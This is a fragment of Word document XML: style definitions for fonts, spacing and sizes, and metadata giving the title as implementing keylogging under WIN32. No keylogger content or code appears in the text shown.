    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:sz w:val="26"/>
      <w:szCs w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="j">
    <w:name w:val="j"/>
    <w:basedOn w:val="a"/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
      <w:ind w:firstLine="600"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="c">
    <w:name w:val="c"/>
    <w:basedOn w:val="a"/>
    <w:uiPriority w:val="9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r">
    <w:name w:val="r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l">
    <w:name w:val="l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captionc">
    <w:name w:val="captionc"/>
    <w:basedOn w:val="a"/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
      <w:sz w:val="26"/>
      <w:szCs w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="captionr">
    <w:name w:val="captionr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  <w:sz w:val="26"/>
      <w:szCs w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="captionl">
    <w:name w:val="captionl"/>
    <w:basedOn w:val="a"/>
    <w:uiPriority w:val="99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smallc">
    <w:name w:val="smallc"/>
    <w:basedOn w:val="a"/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
      <w:sz w:val="17"/>
      <w:szCs w:val="17"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="smallr">
    <w:name w:val="smallr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  <w:sz w:val="17"/>
      <w:szCs w:val="17"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="smalll">
    <w:name w:val="smalll"/>
    <w:basedOn w:val="a"/>
    <w:uiPriority w:val="99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tt">
    <w:name w:val="tt"/>
    <w:basedOn w:val="a"/>
    <w:uiPriority w:val="99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ttb">
    <w:name w:val="ttb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mt">
    <w:name w:val="mt"/>
    <w:basedOn w:val="a"/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
      <w:color w:val="FFFFFF"/>
      <w:sz w:val="17"/>
      <w:szCs w:val="17"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="ml">
    <w:name w:val="ml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mltitle">
    <w:name w:val="mltitle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mls">
    <w:name w:val="mls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field">
    <w:name w:val="field"/>
    <w:basedOn w:val="a"/>
    <w:uiPriority w:val="99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message">
    <w:name w:val="message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check">
    <w:name w:val="check"/>
    <w:basedOn w:val="a"/>
    <w:uiPriority w:val="99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button">
    <w:name w:val="button"/>
    <w:basedOn w:val="a"/>
    <w:uiPriority w:val="99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buttons">
    <w:name w:val="buttons"/>
    <w:basedOn w:val="a"/>
    <w:uiPriority w:val="99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character" w:customStyle="1" w:styleId="ml1">
    <w:name w:val="ml1"/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
      <w:color w:val="000000"/>
      <w:sz w:val="17"/>
      <w:szCs w:val="17"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="a6">
    <w:name w:val="с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subj1">
    <w:name w:val="subj1"/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="000000"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20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7">
    <w:name w:val="Strong"/>
    <w:uiPriority w:val="99"/>
    <w:qFormat/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="HTML1">
    <w:name w:val="HTML Code"/>
    <w:uiPriority w:val="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8691</Words>
  <Characters>4954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Реализация keylogging под WIN32 </vt:lpstr>
    </vt:vector>
  </TitlesOfParts>
  <Company>PERSONAL COMPUTERS</Company>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>13618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Реализация keylogging под WIN32 </dc:title>
  <dc:subject/>
  <dc:creator>USER</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>admin</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2014-01-26T07:24:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2014-01-26T07:24:00Z</dcterms:modified>
</cp:coreProperties>
</file>